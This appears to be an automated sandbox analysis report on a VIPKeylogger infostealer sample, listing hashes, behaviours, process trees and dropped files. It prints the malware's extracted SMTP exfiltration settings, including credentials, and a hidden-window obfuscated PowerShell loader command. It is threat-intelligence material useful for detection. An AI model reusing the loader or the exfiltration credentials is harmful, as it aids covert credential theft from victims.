Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 01:35
Static task
static1
Behavioral task
behavioral1
Sample
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kontokurantens.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Kontokurantens.ps1
Resource
win10v2004-20241007-en
General
-
Target
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
-
Size
867KB
-
MD5
25da279ad7ee7cc3b8d3e5cd5aa4b5b2
-
SHA1
d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
-
SHA256
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
-
SHA512
db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
-
SSDEEP
12288:l9Zwb4/I1H06OdtVQuqilUSDFOIBETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0W:/dPFtVtOIB+alCJmvulW6Nd0vu
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.fr - Port:
587 - Username:
[email protected] - Password:
Jc.2o3o@ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 3456 powershell.exe 3676 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 16 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 35 628 msiexec.exe 36 2472 msiexec.exe 38 628 msiexec.exe 39 2472 msiexec.exe 42 628 msiexec.exe 43 2472 msiexec.exe 47 2472 msiexec.exe 48 628 msiexec.exe 52 628 msiexec.exe 53 2472 msiexec.exe 58 628 msiexec.exe 60 628 msiexec.exe 62 2472 msiexec.exe 64 2472 msiexec.exe 66 628 msiexec.exe 68 2472 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 57 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 628 msiexec.exe 2472 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 3676 powershell.exe 3456 powershell.exe 628 msiexec.exe 2472 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exe963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 3676 powershell.exe 3676 powershell.exe 3456 powershell.exe 3456 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 3456 powershell.exe 3456 powershell.exe 3456 powershell.exe 3456 powershell.exe 3676 powershell.exe 3456 powershell.exe 628 msiexec.exe 2472 msiexec.exe 628 msiexec.exe 2472 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 3676 powershell.exe 3456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeIncreaseQuotaPrivilege 3676 powershell.exe Token: SeSecurityPrivilege 3676 powershell.exe Token: SeTakeOwnershipPrivilege 3676 powershell.exe Token: SeLoadDriverPrivilege 3676 powershell.exe Token: SeSystemProfilePrivilege 3676 powershell.exe Token: SeSystemtimePrivilege 3676 powershell.exe Token: SeProfSingleProcessPrivilege 3676 powershell.exe Token: SeIncBasePriorityPrivilege 3676 powershell.exe Token: SeCreatePagefilePrivilege 3676 powershell.exe Token: SeBackupPrivilege 3676 powershell.exe Token: SeRestorePrivilege 3676 powershell.exe Token: SeShutdownPrivilege 3676 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeSystemEnvironmentPrivilege 3676 powershell.exe Token: SeRemoteShutdownPrivilege 3676 powershell.exe Token: SeUndockPrivilege 3676 powershell.exe Token: SeManageVolumePrivilege 3676 powershell.exe Token: 33 3676 powershell.exe Token: 34 3676 powershell.exe Token: 35 3676 powershell.exe Token: 36 3676 powershell.exe Token: SeIncreaseQuotaPrivilege 3456 powershell.exe Token: SeSecurityPrivilege 3456 powershell.exe Token: SeTakeOwnershipPrivilege 3456 powershell.exe Token: SeLoadDriverPrivilege 3456 powershell.exe Token: SeSystemProfilePrivilege 3456 powershell.exe Token: SeSystemtimePrivilege 3456 powershell.exe Token: SeProfSingleProcessPrivilege 3456 powershell.exe Token: SeIncBasePriorityPrivilege 3456 powershell.exe Token: SeCreatePagefilePrivilege 3456 powershell.exe Token: SeBackupPrivilege 3456 powershell.exe Token: SeRestorePrivilege 3456 powershell.exe Token: SeShutdownPrivilege 3456 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeSystemEnvironmentPrivilege 3456 powershell.exe Token: SeRemoteShutdownPrivilege 3456 powershell.exe Token: SeUndockPrivilege 3456 powershell.exe Token: SeManageVolumePrivilege 3456 powershell.exe Token: 33 3456 powershell.exe Token: 34 3456 powershell.exe Token: 35 3456 powershell.exe Token: 36 3456 powershell.exe Token: SeDebugPrivilege 628 msiexec.exe Token: SeDebugPrivilege 2472 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exepowershell.exepowershell.exedescription pid process target process PID 4976 wrote to memory of 3676 4976 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe powershell.exe PID 4976 wrote to memory of 3676 4976 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe powershell.exe PID 4976 wrote to memory of 3676 4976 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe powershell.exe PID 4976 wrote to memory of 3456 4976 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe powershell.exe PID 4976 wrote to memory of 3456 4976 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe powershell.exe PID 4976 wrote to memory of 3456 4976 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe powershell.exe PID 3676 wrote to memory of 628 3676 powershell.exe msiexec.exe PID 3676 wrote to memory of 628 3676 powershell.exe msiexec.exe PID 3676 wrote to memory of 628 3676 powershell.exe msiexec.exe PID 3676 wrote to memory of 628 3676 powershell.exe msiexec.exe PID 3456 wrote to memory of 2472 3456 powershell.exe msiexec.exe PID 3456 wrote to memory of 2472 3456 powershell.exe msiexec.exe PID 3456 wrote to memory of 2472 3456 powershell.exe msiexec.exe PID 3456 wrote to memory of 2472 3456 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe"C:\Users\Admin\AppData\Local\Temp\963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2472
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD576b2de4276a82861ed2fc9622aca4532
SHA1121d53d4ccd29ff917c424c703a718f4ce811172
SHA256a5d281814ab7745a410c2de4e66244f253662f3c78fdc0d2a280632afab807e4
SHA512de2758ac45fd6d48008c9ad0f58e71d064e6284f8665cd09794f9d1a6d6c2747ed7c9be6f6a784c530b72290c0de015849e9a650e2ddd7172dda1dba79562605
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5ed2bc277627fe9729bb6e14fc0ca8651
SHA145904821d33b90391b60e1c78283343b40167f79
SHA2567d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5452e11716ea4843afe2f66561e31bed5
SHA136e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA2569daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD521a7970c25a078b65c5dc62049dbb8ad
SHA1a748981e50aca774c23308e8c0c48be93de54c3b
SHA256ce62852692f0ceac64667adfd39543604ff2387303ad85be25632d5651749881
SHA512a169dca197116675c7c03fbc3c53e8f9cafe07f956ccfcbdfd8fe798d81b4d087c10407cbc40bdddb228645719917cb361cbc73d7bcbf4395e6b27638ec35a5c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD53586bcf785a9b5e614212ba28e5a4f25
SHA14ea9569065e877458fba16c4e57de43192589252
SHA256bd540672b4bdf4b0d1e5ec3e234fee7a3186b37b45847bd0a3ca07c07493b746
SHA512728b977fded95ec86a45b9632a592a7853c6f7b1786666ee961d00d0ecde111a9b08a6eaf401ac14b46ebcb7069b4aa01a6f407d35458d8ad1e407eef1b64d2e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5c546e0bbf27c0c58d2d4eff99e2ba7d6
SHA10d88537bd1de14795c8e308a88e2a7189e92edcd
SHA256ce50f7e6a83f8c3f88c198a7ad96f50536aa363cb8fba62b042aac1fffd45a5b
SHA5121ad3555644287c10d2421345e03d5046bf2ff0aa7f7b9e5f3e23ba368ba140c67be47cbe46a51dba172e14386914e975855c19417982beb9e3e94aee08628d30
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD5f4d186701aa36a7117d76d4f6dc81971
SHA1e291596f8819b2289a831d3380c2e7341453da2f
SHA25652090518efb169d6c809b232d61229440996e2f00fbd654ca6bbaf13a6d740da
SHA5129fac811b8e507fd6dd84338d5f6379ecb45619199c5c9361fbb4f0cb7fae6f9ee8a7861b6d1724bc89fdba9037c3c64e7497f32641e6e47216fe369e4ecaa5c1
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
334KB
MD58dc34d1e450d9695f44738379365b189
SHA19e77d26860ba038a647b6670fd0ddd2c961d0666
SHA256fb8575b17a714bab821f43e25454975876348a6ccf9fb580f25351311d09690b
SHA512f842056d5dcd6f43c88ff6ba91eb6207d3fa48b4e38f050a756fbe3d281cf8483def8a4221f63407953d589be05a7505c31fc6df12a0ed77dd64581e27722f08
-
Filesize
50KB
MD58a4da8bab6993bc24f8ba89b1a5035ba
SHA10266616ebaff76b9027bdf4a52742bbb6d7dbf90
SHA256d19add8d848501931650d9c2f77d4519b15ffe2399a161dac88ea99c07f1b62d
SHA5121f604a65b0fb4543feab6eb9584aab3c47c5ebcabf251492c7be827e3c5d547f310ff05354bf30837fe8192be427c1855ec22783a0be14db15b40b1f05a13c50